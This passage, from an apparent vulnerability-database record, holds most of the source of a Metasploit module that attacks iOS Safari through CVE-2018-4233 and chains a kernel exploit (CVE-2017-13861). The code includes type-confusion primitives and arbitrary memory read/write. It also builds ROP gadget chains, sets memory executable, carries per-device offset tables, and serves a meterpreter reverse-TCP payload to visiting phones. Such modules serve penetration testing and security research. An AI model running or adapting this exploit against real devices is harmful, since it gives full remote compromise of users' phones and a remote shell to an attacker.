arr[pos++] = 0xdead0020; // unused\n arr[pos++] = 0xdead0021; // unused\n arr[pos++] = 0xdead0022; // unused\n arr[pos++] = 0xdead0023; // unused\n arr[pos++] = 0xdead0024; // x22 (unused)\n arr[pos++] = 0xdead0025; // x22 (unused)\n arr[pos++] = 0xdead0026; // x21 (unused)\n arr[pos++] = 0xdead0027; // x21 (unused)\n arr[pos++] = 0xdead0028; // x20 (unused)\n arr[pos++] = 0xdead0029; // x20 (unused)\n arr[pos++] = 0xdead002a; // x19 (unused)\n arr[pos++] = 0xdead002b; // x19 (unused)\n tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4 + 0x70).lo(); // x29\n arr[pos++] = Add(stack, tmppos*4 + 0x70).hi(); // x29\n arr[pos++] = jump_to.lo(); // x30 (gadget)\n arr[pos++] = jump_to.hi(); // x30 (gadget)\n }\n\n var add_call_via_x8 = function(func, x0, x1, x2, x3, x4, jump_to) {\n //alert(`add_call_via_x8: ${func}(${x0}, ${x1}, ${x2}, ${x3}, ${x4}, ${jump_to})`);\n //x4 = x4 || Int64.One\n // in stackloader:\n arr[pos++] = 0xdead0010; // unused\n arr[pos++] = 0xdead0011; // unused\n arr[pos++] = 0xdead0012; // unused\n arr[pos++] = 0xdead0013; // unused\n arr[pos++] = 0xdead1101; // x28 (unused)\n arr[pos++] = 0xdead1102; // x28 (unused)\n arr[pos++] = 0xdead0014; // x27 == x6 (unused)\n arr[pos++] = 0xdead0015; // x27 == x6 (unused)\n arr[pos++] = 0xdead0016; // x26 (unused)\n arr[pos++] = 0xdead0017; // x26 (unused)\n arr[pos++] = x3.lo(); // x25 == x3 (arg4)\n arr[pos++] = x3.hi(); // x25 == x3 (arg4)\n arr[pos++] = x0.lo(); // x24 == x0 (arg1)\n arr[pos++] = x0.hi(); // x24 == x0 (arg1)\n arr[pos++] = x2.lo(); // x23 == x2 (arg3)\n arr[pos++] = x2.hi(); // x23 == x2 (arg3)\n arr[pos++] = x3.lo(); // x22 == x3 (arg4)\n arr[pos++] = x3.hi(); // x22 == x3 (arg4)\n arr[pos++] = func.lo(); // x21 (target for dispatch)\n arr[pos++] = func.hi(); // x21 (target for dispatch)\n arr[pos++] = 0xdead0018; // x20 (unused)\n arr[pos++] = 0xdead0019; // x20 (unused)\n var tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4).lo(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = Add(stack, tmppos*4).hi(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = 0xdead001c; // x29 (unused)\n arr[pos++] = 0xdead001d; // x29 (unused)\n arr[pos++] = ldrx8.lo(); // x30 (next gadget)\n arr[pos++] = ldrx8.hi(); // x30 (next gadget)\n\n // in ldrx8\n if (x4) {\n arr[pos++] = stackloader.lo();\n arr[pos++] = stackloader.hi();\n } else {\n arr[pos++] = dispatch.lo(); // x8 (target for regloader)\n arr[pos++] = dispatch.hi(); // x8 (target for regloader)\n }\n arr[pos++] = 0xdead1401; // (unused)\n arr[pos++] = 0xdead1402; // (unused)\n arr[pos++] = 0xdead1301; // x20 (unused)\n arr[pos++] = 0xdead1302; // x20 (unused)\n arr[pos++] = x1.lo(); // x19 == x1 (arg2)\n arr[pos++] = x1.hi(); // x19 == x1 (arg2)\n arr[pos++] = 0xdead1201; // x29 (unused)\n arr[pos++] = 0xdead1202; // x29 (unused)\n arr[pos++] = regloader.lo(); // x30 (next gadget)\n arr[pos++] = regloader.hi(); // x30 (next gadget)\n\n // in regloader\n // NOTE: REGLOADER DOES NOT ADJUST SP!\n // sometimes i didn't get expected value in x4\n // and i have no earthly idea why\n // usleep likely did the trick, but I would still keep the code\n // with movx4\n //arr[pos++] = x4.lo() // x4 (should be -- but see lines above)\n //arr[pos++] = x4.hi() // x4 (should be -- but see lines above)\n\n if (x4) {\n // in stackloader:\n arr[pos++] = 0xdaad0010; // unused\n arr[pos++] = 0xdaad0011; // unused\n arr[pos++] = 0xdaad0012; // unused\n arr[pos++] = 0xdaad0013; // unused\n arr[pos++] = 0xdaad1101; // x28 (unused)\n arr[pos++] = 0xdaad1102; // x28 (unused)\n arr[pos++] = 0xdaad0014; // x27 == x6 (unused)\n arr[pos++] = 0xdaad0015; // x27 == x6 (unused)\n arr[pos++] = 0xdaad0016; // x26 (unused)\n arr[pos++] = 0xdaad0017; // x26 (unused)\n arr[pos++] = 0xdaad0018; // x25 (unused)\n arr[pos++] = 0xdaad0019; // x25 (unused)\n arr[pos++] = 0xdaad00f0; // x24 (unused)\n arr[pos++] = 0xdaad00f1; // x24 (unused)\n arr[pos++] = 0xdaad00f2; // x23 (unused)\n arr[pos++] = 0xdaad00f3; // x23 (unused)\n arr[pos++] = 0xdaad00f4; // x22 (unused)\n arr[pos++] = 0xdaad00f5; // x22 (unused)\n arr[pos++] = func.lo(); // x21 (target for dispatch)\n arr[pos++] = func.hi(); // x21 (target for dispatch)\n arr[pos++] = 0xdaad0018; // x20 (unused)\n arr[pos++] = 0xdaad0019; // x20 (unused)\n tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4).lo(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = Add(stack, tmppos*4).hi(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = 0xdaad001c; // x29 (unused)\n arr[pos++] = 0xdaad001d; // x29 (unused)\n arr[pos++] = ldrx8.lo(); // x30 (next gadget)\n arr[pos++] = ldrx8.hi(); // x30 (next gadget)\n\n // in ldrx8\n arr[pos++] = dispatch.lo(); // x8 (target for movx4)\n arr[pos++] = dispatch.hi(); // x8 (target for movx4)\n arr[pos++] = 0xdaad1401; // (unused)\n arr[pos++] = 0xdaad1402; // (unused)\n arr[pos++] = x4.lo(); // x20 == x4 (arg5)\n arr[pos++] = x4.hi(); // x20 == x4 (arg5)\n arr[pos++] = 0xdaad1301; // x19 (unused)\n arr[pos++] = 0xdaad1302; // x19 (unused)\n arr[pos++] = 0xdaad1201; // x29 (unused)\n arr[pos++] = 0xdaad1202; // x29 (unused)\n arr[pos++] = movx4.lo(); // x30 (next gadget)\n arr[pos++] = movx4.hi(); // x30 (next gadget)\n }\n\n // after dispatch:\n\n // keep only one: these or 0xdeaded01\n arr[pos++] = 0xdead0022; // unused\n arr[pos++] = 0xdead0023; // unused\n\n arr[pos++] = 0xdead0022; // unused\n arr[pos++] = 0xdead0023; // unused\n arr[pos++] = 0xdead0024; // x22 (unused)\n arr[pos++] = 0xdead0025; // x22 (unused)\n arr[pos++] = 0xdead0026; // x21 (unused)\n arr[pos++] = 0xdead0027; // x21 (unused)\n arr[pos++] = 0xdead0028; // x20 (unused)\n arr[pos++] = 0xdead0029; // x20 (unused)\n arr[pos++] = 0xdead002a; // x19 (unused)\n arr[pos++] = 0xdead002b; // x19 (unused)\n arr[pos++] = 0xdead002c; // x29 (unused)\n arr[pos++] = 0xdead002d; // x29 (unused)\n arr[pos++] = jump_to.lo(); // x30 (gadget)\n arr[pos++] = jump_to.hi(); // x30 (gadget)\n }\n\n var add_call = function(func, x0, x1, x2, x3, x4, jump_to) {\n x0 = x0 || Int64.Zero\n x1 = x1 || Int64.Zero\n x2 = x2 || Int64.Zero\n x3 = x3 || Int64.Zero\n jump_to = jump_to || stackloader\n\n return (ldrx8 ? add_call_via_x8 : add_call_llvm)(\n func, x0, x1, x2, x3, x4, jump_to\n )\n }\n\n #{ios_11 ? '\n if (jitWriteSeparateHeaps.lo() || jitWriteSeparateHeaps.hi()) {\n add_call(jitWriteSeparateHeaps\n , Sub(codeAddr, memPoolStart) // off\n , paddr // src\n , shsz // size\n );\n } else {\n fail(\"jitWrite\");\n }\n ' : '\n add_call(mach_vm_protect,\n mach_task_self_, // task\n codeAddr, // addr\n shsz, // size\n new Int64(0), // set maximum\n new Int64(7) // prot (RWX)\n );\n\n add_call(memmove,\n codeAddr, // dst\n paddr, // src\n shsz // size\n );\n '}\n\n add_call(codeAddr,\n dlopen,\n dlsym,\n jitWriteSeparateHeaps,\n memPoolStart,\n memPoolEnd,\n );\n\n for(var i = 0; i < 0x20; ++i)\n {\n arr[pos++] = 0xde00c0de + (i<<16);\n }\n\n var sp = Add(stack, (arrsz - off) * 4);\n memory.writeInt64(Add(el_addr, 0x60), Add(sp, 0x60)); // x29\n memory.writeInt64(Add(el_addr, 0x68), sp); // x2 (copied into sp)\n\n // trigger\n //print(\"u rdy?\")\n wrapper.addEventListener(\"click\", function(){});\n\n}\n\n#{get_mem_rw}\n\nfunction go() {\n try {\n var req = new XMLHttpRequest;\n req.open(\"GET\", \"exploit\");\n req.responseType = \"arraybuffer\";\n req.addEventListener(\"load\", function() {\n try {\n if (req.responseType != \"arraybuffer\") throw \"y u no blob\";\n payload.set(new Uint8Array(req.response), 0x0);\n pwn();\n } catch (e) {\n fail(\"Error: \" + e + (e != null ? \" \" + e.stack : \"\"))\n }\n });\n req.addEventListener(\"error\", function(ev) {\n fail(ev)\n });\n req.send()\n } catch (e) {\n fail(\"Error: \" + e + (e != null ? \" \" + e.stack : \"\"))\n }\n};\n\ngo();\n\n</script>\n</body>\n</html>\n ^\n unless datastore['DEBUG_EXPLOIT']\n html.gsub!(/\\/\\/.*$/, '') # strip comments\n html.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*);\n end\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/apple_ios/browser/webkit_createthis.rb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T17:08:04", "description": "This module exploits a type confusion bug in the Javascript Proxy object in WebKit. The DFG JIT does not take into account that, through the use of a Proxy, it is possible to run arbitrary JS code during the execution of a CreateThis operation. This makes it possible to change the structure of e.g. an argument without causing a bailout, leading to a type confusion (CVE-2018-4233). The type confusion leads to the ability to allocate fake Javascript objects, as well as the ability to find the address in memory of a Javascript object. This allows us to construct a fake JSCell object that can be used to read and write arbitrary memory from Javascript. The module then uses a ROP chain to write the first stage shellcode into executable memory within the Safari process and kick off its execution. The first stage maps the second stage macho (containing CVE-2017-13861) into executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake exploit leads to a kernel task port (TFP0) that can read and write arbitrary kernel memory. The processes credential and sandbox structure in the kernel is overwritten and the meterpreter payloads code signature hash is added to the kernels trust cache, allowing Safari to load and execute the (self-signed) meterpreter payload.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-02T02:19:24", "type": "metasploit", "title": "Safari Webkit Proxy Object Type Confusion", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13861", "CVE-2018-4233"], "modified": "2021-02-25T16:47:49", "id": "MSF:EXPLOIT/APPLE_IOS/BROWSER/WEBKIT_CREATETHIS/", "href": "https://www.rapid7.com/db/modules/exploit/apple_ios/browser/webkit_createthis/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Safari Webkit Proxy Object Type Confusion',\n 'Description' => %q{\n This module exploits a type confusion bug in the Javascript Proxy object in\n WebKit. The DFG JIT does not take into account that, through the use of a Proxy,\n it is possible to run arbitrary JS code during the execution of a CreateThis\n operation. This makes it possible to change the structure of e.g. an argument\n without causing a bailout, leading to a type confusion (CVE-2018-4233).\n\n The type confusion leads to the ability to allocate fake Javascript objects,\n as well as the ability to find the address in memory of a Javascript object.\n This allows us to construct a fake JSCell object that can be used to read\n and write arbitrary memory from Javascript. The module then uses a ROP chain\n to write the first stage shellcode into executable memory within the Safari\n process and kick off its execution.\n\n The first stage maps the second stage macho (containing CVE-2017-13861) into\n executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake\n exploit leads to a kernel task port (TFP0) that can read and write arbitrary\n kernel memory. The processes credential and sandbox structure in the kernel\n is overwritten and the meterpreter payloads code signature hash is added to\n the kernels trust cache, allowing Safari to load and execute the (self-signed)\n meterpreter payload.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'saelo',\n 'niklasb',\n 'Ian Beer',\n 'siguza',\n ],\n 'References' => [\n ['CVE', '2018-4233'],\n ['CVE', '2017-13861'],\n ['URL', 'https://github.com/saelo/cve-2018-4233'],\n ['URL', 'https://github.com/phoenhex/files/tree/master/exploits/ios-11.3.1'],\n ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1417'],\n ['URL', 'https://github.com/JakeBlair420/totally-not-spyware/blob/master/root/js/spyware.js'],\n ],\n 'Arch' => ARCH_AARCH64,\n 'Platform' => 'apple_ios',\n 'DefaultTarget' => 0,\n 'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' },\n 'Targets' => [[ 'Automatic', {} ]],\n 'DisclosureDate' => '2018-03-15'))\n register_advanced_options([\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information in the exploit javascript\", false]),\n OptBool.new('DUMP_OFFSETS', [false, \"Show newly found offsets in a javascript prompt\", false]),\n ])\n end\n\n def payload_url\n \"tcp://#{datastore[\"LHOST\"]}:#{datastore[\"LPORT\"]}\"\n end\n\n def get_version(user_agent)\n if user_agent =~ /OS (.*?) like Mac OS X\\)/\n ios_version = Rex::Version.new($1.gsub(\"_\", \".\"))\n return ios_version\n end\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\n end\n\n def on_request_uri(cli, request)\n if request.uri =~ %r{/apple-touch-icon*}\n return\n elsif request.uri =~ %r{/favicon*}\n return\n elsif request.uri =~ %r{/payload10$*}\n payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib_sha1\n send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})\n print_good(\"Sent sha1 iOS 10 payload\")\n return\n elsif request.uri =~ %r{/payload11$*}\n payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib\n send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})\n print_good(\"Sent sha256 iOS 11 payload\")\n return\n end\n\n user_agent = request['User-Agent']\n print_status(\"Requesting #{request.uri} from #{user_agent}\")\n version = get_version(user_agent)\n ios_11 = (version >= Rex::Version.new('11.0.0'))\n if request.uri =~ %r{/exploit$}\n loader_data = exploit_data('CVE-2017-13861', 'exploit')\n srvhost = Rex::Socket.resolv_nbo_i(srvhost_addr)\n config = [srvhost, srvport].pack(\"Nn\") + payload_url\n payload_url_index = loader_data.index('PAYLOAD_URL')\n loader_data[payload_url_index, config.length] = config\n print_good(\"Sent async_wake exploit\")\n send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})\n return\n end\n\n get_mem_rw_ios_10 = %Q^\nfunction get_mem_rw(stage1) {\n var structs = [];\n function sprayStructures() {\n function randomString() {\n return Math.random().toString(36).replace(/[\\^a-z]+/g, \"\").substr(0, 5)\n }\n for (var i = 0; i < 4096; i++) {\n var a = new Float64Array(1);\n a[randomString()] = 1337;\n structs.push(a)\n }\n }\n sprayStructures();\n var hax = new Uint8Array(4096);\n var jsCellHeader = new Int64([0, 16, 0, 0, 0, 39, 24, 1]);\n var container = {\n jsCellHeader: jsCellHeader.asJSValue(),\n butterfly: false,\n vector: hax,\n lengthAndFlags: (new Int64(\"0x0001000000000010\")).asJSValue()\n };\n var address = Add(stage1.addrof(container), 16);\n var fakearray = stage1.fakeobj(address);\n while (!(fakearray instanceof Float64Array)) {\n jsCellHeader.assignAdd(jsCellHeader, Int64.One);\n container.jsCellHeader = jsCellHeader.asJSValue()\n }\n memory = {\n read: function(addr, length) {\n fakearray[2] = i2f(addr);\n var a = new Array(length);\n for (var i = 0; i < length; i++) a[i] = hax[i];\n return a\n },\n readInt64: function(addr) {\n return new Int64(this.read(addr, 8))\n },\n write: function(addr, data) {\n fakearray[2] = i2f(addr);\n for (var i = 0; i < data.length; i++) hax[i] = data[i]\n },\n writeInt64: function(addr, val) {\n return this.write(addr, val.bytes())\n },\n };\n var empty = {};\n var header = memory.read(stage1.addrof(empty), 8);\n memory.write(stage1.addrof(container), header);\n var f64array = new Float64Array(8);\n header = memory.read(stage1.addrof(f64array), 16);\n memory.write(stage1.addrof(fakearray), header);\n memory.write(Add(stage1.addrof(fakearray), 24), [16, 0, 0, 0, 1, 0, 0, 0]);\n fakearray.container = container;\n return memory;\n}\n^\n\n get_mem_rw_ios_11 = %Q^\nfunction get_mem_rw(stage1) {\n var FPO = typeof(SharedArrayBuffer) === 'undefined' ? 0x18 : 0x10;\n var structure_spray = []\n for (var i = 0; i < 1000; ++i) {\n var ary = {a:1,b:2,c:3,d:4,e:5,f:6,g:0xfffffff}\n ary['prop'+i] = 1\n structure_spray.push(ary)\n }\n var manager = structure_spray[500]\n var leak_addr = stage1.addrof(manager)\n //print('leaking from: '+ hex(leak_addr))\n function alloc_above_manager(expr) {\n var res\n do {\n for (var i = 0; i < ALLOCS; ++i) {\n structure_spray.push(eval(expr))\n }\n res = eval(expr)\n } while (stage1.addrof(res) < leak_addr)\n return res\n }\n var unboxed_size = 100\n var unboxed = alloc_above_manager('[' + '13.37,'.repeat(unboxed_size) + ']')\n var boxed = alloc_above_manager('[{}]')\n var victim = alloc_above_manager('[]')\n // Will be stored out-of-line at butterfly - 0x10\n victim.p0 = 0x1337\n function victim_write(val) {\n victim.p0 = val\n }\n function victim_read() {\n return victim.p0\n }\n i32[0] = 0x200 // Structure ID\n i32[1] = 0x01082007 - 0x10000 // Fake JSCell metadata, adjusted for boxing\n var outer = {\n p0: 0, // Padding, so that the rest of inline properties are 16-byte aligned\n p1: f64[0],\n p2: manager,\n p3: 0xfffffff, // Butterfly indexing mask\n }\n var fake_addr = stage1.addrof(outer) + FPO + 0x8;\n //print('fake obj @ ' + hex(fake_addr))\n var unboxed_addr = stage1.addrof(unboxed)\n var boxed_addr = stage1.addrof(boxed)\n var victim_addr = stage1.addrof(victim)\n //print('leak ' + hex(leak_addr)\n //+ ' unboxed ' + hex(unboxed_addr)\n //+ ' boxed ' + hex(boxed_addr)\n //+ ' victim ' + hex(victim_addr))\n var holder = {fake: {}}\n holder.fake = stage1.fakeobj(fake_addr)\n // From here on GC would be uncool\n // Share a butterfly for easier boxing/unboxing\n var shared_butterfly = f2i(holder.fake[(unboxed_addr + 8 - leak_addr) / 8])\n var boxed_butterfly = holder.fake[(boxed_addr + 8 - leak_addr) / 8]\n holder.fake[(boxed_addr + 8 - leak_addr) / 8] = i2f(shared_butterfly)\n var victim_butterfly = holder.fake[(victim_addr + 8 - leak_addr) / 8]\n function set_victim_addr(where) {\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = i2f(where + 0x10)\n }\n function reset_victim_addr() {\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = victim_butterfly\n }\n var stage2 = {\n addrof: function(victim) {\n boxed[0] = victim\n return f2i(unboxed[0])\n },\n fakeobj: function(addr) {\n unboxed[0] = i2f(addr)\n return boxed[0]\n },\n write64: function(where, what) {\n set_victim_addr(where)\n victim_write(this.fakeobj(what))\n reset_victim_addr()\n },\n read64: function(where) {\n set_victim_addr(where)\n var res = this.addrof(victim_read())\n reset_victim_addr()\n return res;\n },\n write_non_zero: function(where, values) {\n for (var i = 0; i < values.length; ++i) {\n if (values[i] != 0)\n this.write64(where + i*8, values[i])\n }\n },\n readInt64: function(where) {\n if (where instanceof Int64) {\n where = Add(where, 0x10);\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = where.asDouble();\n } else {\n set_victim_addr(where);\n }\n boxed[0] = victim_read();\n var res = f2i(unboxed[0]);\n reset_victim_addr();\n return new Int64(res);\n },\n read: function(addr, length) {\n var address = new Int64(addr);\n var a = new Array(length);\n var i;\n\n for (i = 0; i + 8 < length; i += 8) {\n v = this.readInt64(Add(address, i)).bytes()\n for (var j = 0; j < 8; j++) {\n a[i+j] = v[j];\n }\n }\n\n v = this.readInt64(Add(address, i)).bytes()\n for (var j = i; j < length; j++) {\n a[j] = v[j - i];\n }\n\n return a\n },\n test: function() {\n this.write64(boxed_addr + 0x10, 0xfff) // Overwrite index mask, no biggie\n if (0xfff != this.read64(boxed_addr + 0x10)) {\n fail(2)\n }\n },\n }\n // Test read/write\n stage2.test()\n return stage2;\n}\n^\n\n get_mem_rw = (version >= Rex::Version.new('11.2.2')) ? get_mem_rw_ios_11 : get_mem_rw_ios_10\n utils = exploit_data \"javascript_utils\", \"utils.js\"\n int64 = exploit_data \"javascript_utils\", \"int64.js\"\n dump_offsets = ''\n if datastore['DUMP_OFFSETS']\n dump_offsets = %Q^\n var offsetstr = uuid + \" : { \";\n var offsetarray = [ \"_dlsym\", \"_dlopen\", \"__longjmp\", \"regloader\", \"dispatch\", \"stackloader\", \"movx4\", \"ldrx8\", \"_mach_task_self_\", \"__kernelrpc_mach_vm_protect_trap\", \"__platform_memmove\",\n \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\", \"__ZN3JSC29jitWriteSeparateHeapsFunctionE\", \"__ZN3JSC32startOfFixedExecutableMemoryPoolE\", ];\n for (var i = 0; i < offsetarray.length; i++) {\n var offset = offsets[offsetarray[i]];\n if (offset) {\n var offsethex = Sub(offset, cache_slide).toString().replace(\"0x0000000\", \"0x\");\n offsetstr += \"\\\\\"\" + offsetarray[i] + \"\\\\\" : \" + offsethex + \", \";\n }\n }\n offsetstr += \"}, \";\n prompt(\"offsets: \", offsetstr);\n^\n end\n\n html = %Q^\n<html>\n<body>\n<script>\n\n#{utils}\n#{int64}\n\nprint = alert;\nITERS = 1E4;\nALLOCS = 1E3;\n\nvar conversion_buffer = new ArrayBuffer(8);\nvar f64 = new Float64Array(conversion_buffer);\nvar i32 = new Uint32Array(conversion_buffer);\nvar BASE32 = 0x100000000;\n\nfunction f2i(f) {\n f64[0] = f;\n return i32[0] + BASE32 * i32[1];\n}\n\nfunction i2f(i) {\n i32[0] = i % BASE32;\n i32[1] = i / BASE32;\n return f64[0];\n}\n\nfunction hexit(x) {\n if (x instanceof Int64) return x.toString();\n if (x < 0) return \"-\" + hex(-x);\n return \"0x\" + x.toString(16);\n}\n\nfunction fail(x) {\n print('FAIL ' + x);\n location.reload();\n throw null;\n}\n\ncounter = 0;\n\n// CVE-2018-4233\nfunction trigger(constr, modify, res, val) {\n return eval(`\n var o = [13.37]\n var Constructor${counter} = function(o) { ${constr} }\n var hack = false\n var Wrapper = new Proxy(Constructor${counter}, {\n get: function() {\n if (hack) {\n ${modify}\n }\n }\n })\n for (var i = 0; i < ITERS; ++i)\n new Wrapper(o)\n hack = true\n var bar = new Wrapper(o)\n ${res}\n `)\n}\n\nvar workbuf = new ArrayBuffer(0x1000000);\nvar payload = new Uint8Array(workbuf);\n\nfunction pwn() {\n var stage1 = {\n addrof: function(victim) {\n return f2i(trigger(\"this.result = o[0]\", \"o[0] = val\", \"bar.result\", victim))\n },\n fakeobj: function(addr) {\n return trigger(\"o[0] = val\", \"o[0] = {}\", \"o[0]\", i2f(addr))\n },\n test: function() {\n var addr = this.addrof({\n a: 4919\n });\n var x = this.fakeobj(addr);\n if (x.a != 4919) fail(\"stage1\")\n }\n };\n stage1.test();\n\n var stage2 = get_mem_rw(stage1);\n var FPO = #{ios_11 ? \"(typeof(SharedArrayBuffer) === 'undefined') ? 0x20 : 0x18;\" : \"0x18;\"}\n var memory = stage2;\n memory.u32 = _u32;\n\n var wrapper = document.createElement(\"div\");\n var wrapper_addr = stage1.addrof(wrapper);\n var el_addr = memory.readInt64(wrapper_addr + FPO);\n var vtab = memory.readInt64(el_addr);\n\n var anchor = memory.readInt64(vtab);\n var hdr = Sub(anchor, anchor.lo() & 0xfff);\n var b = [];\n while(true)\n {\n if (memory.readInt64(hdr).lo() == 4277009104) {\n fail('WebCore ' + hdr + ' post spectre support coming soon');\n }\n if(strcmp(memory.read(hdr, 0x10), \"dyld_v1 arm64\"))\n {\n break;\n }\n hdr = Sub(hdr, 0x1000);\n }\n\n var base_seg = null;\n var nsegs = memory.u32(Add(hdr, 0x14));\n var segdata = memory.read(Add(hdr, memory.u32(Add(hdr, 0x10))), nsegs * 0x20);\n var segs = [];\n for(var i = 0; i < nsegs; ++i)\n {\n var off = i * 0x20;\n var seg =\n {\n addr: new Int64(segdata.slice(off + 0x0, off + 0x8)),\n size: new Int64(segdata.slice(off + 0x8, off + 0x10)),\n fileoff: new Int64(segdata.slice(off + 0x10, off + 0x18)),\n maxprot: b2u32(segdata.slice(off + 0x18, off + 0x1c)),\n initprot: b2u32(segdata.slice(off + 0x1c, off + 0x20))\n };\n segs.push(seg);\n if(seg.fileoff.hi() == 0 && seg.fileoff.lo() == 0 && (seg.size.hi() != 0 || seg.size.lo() != 0))\n {\n base_seg = seg;\n }\n }\n if(base_seg == null)\n {\n fail(\"base_seg\");\n }\n\n var cache_slide = Sub(hdr, base_seg.addr);\n var uuid = memory.readInt64(Add(hdr, 0x58)).lo();\n var offset_cache = {\n // iPod Touch 10.1.1\n 788795426 : { \"_dlsym\" : 0x18052ddd8, \"_dlopen\" : 0x18052dd10, \"__longjmp\" : 0x1806ffb78, \"regloader\" : 0x180f0622c, \"dispatch\" : 0x180d7e058, \"stackloader\" : 0x18099a8e8, \"_mach_task_self_\" : 0x1a586e3bc,\n \"__kernelrpc_mach_vm_protect_trap\" : 0x1806240a4, \"__platform_memmove\" : 0x1806ffe00, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1a457c438, },\n\n // iPhone 5S 10.2.1\n 3432281541 : { \"_dlsym\" : 0x18052edd8, \"_dlopen\" : 0x18052ed10, \"__longjmp\" : 0x180700b78, \"regloader\" : 0x180f07230, \"dispatch\" : 0x180d7f05c, \"stackloader\" : 0x18099b8ec, \"mach_task_self\" : 0x1a6da23bc,\n \"__kernelrpc_mach_vm_protect_trap\" : 0x1806250c0, \"__platform_memmove\" : 0x180700e00, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1a5a0d438, },\n\n // iPhone 6S 11.0.3\n 425478416 : { \"_dlsym\" : 0x180587574, \"_dlopen\" : 0x180587460, \"__longjmp\" : 0x1807bd7dc, \"regloader\" : 0x180051ad8, \"dispatch\" : 0x19b323a4c, \"stackloader\" : 0x19b2e6f40, \"movx4\" : 0x19b33305c,\n \"ldrx8\" : 0x180060028, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1b15d8a00, \"__ZN3JSC29jitWriteSeparateHeapsFunctionE\" : 0x1b15d8a08, \"__ZN3JSC32startOfFixedExecutableMemoryPoolE\" : 0x1b15d89f8, },\n };\n\n var offsets = offset_cache[uuid];\n if (offsets)\n {\n var k = Object.keys(offsets);\n for(var i = 0; i < k.length; ++i)\n {\n var s = k[i];\n offsets[s] = Add(offsets[s], cache_slide);\n }\n }\n else\n {\n var syms = {};\n var gadgets = {};\n\n for(var i = 0; i < segs.length; ++i)\n {\n segs[i].addr = Add(segs[i].addr, cache_slide);\n }\n var libs =\n {\n \"/usr/lib/system/libdyld.dylib\": [\"_dlsym\", \"_dlopen\"],\n #{ ios_11 ? '\n \"/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore\": [\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"],\n \"/usr/lib/system/libsystem_platform.dylib\": [\"__longjmp\"],\n ' : '\n \"/usr/lib/system/libsystem_platform.dylib\": [\"__longjmp\", \"__platform_memmove\"],\n \"/usr/lib/system/libsystem_kernel.dylib\": [\"_mach_task_self_\", \"__kernelrpc_mach_vm_protect_trap\"],\n \"/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore\": [\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"],\n '}\n }\n\n #{ ios_11 ? '\n var opcodes = {\n // ldr x8, [sp] ; str x8, [x19] ; ldp x29, x30, [sp, #0x20] ; ldp x20, x19, [sp, #0x10] ; add sp, sp, #0x30 ; ret\n \"ldrx8\": [ [0xf94003e8, 0xf9000268, 0xa9427bfd, 0xa9414ff4, 0x9100c3ff, 0xd65f03c0] ],\n // blr x21; ldp x29, x30, [sp, 0x30]; ldp x20, x19, [sp, 0x20]; ldp x22, x21, [sp, 0x10]; add sp, sp, 0x40; ret\n \"dispatch\": [ [ 0xd63f02a0, 0xa9437bfd, 0xa9424ff4, 0xa94157f6, 0x910103ff, 0xd65f03c0 ] ],\n // mov x3, x22 ; mov x6, x27 ; mov x0, x24 ; mov x1, x19 ; mov x2, x23 ; ldr x4, [sp] ; blr x8\n \"regloader\": [ [ 0xaa1603e3, 0xaa1b03e6, 0xaa1803e0, 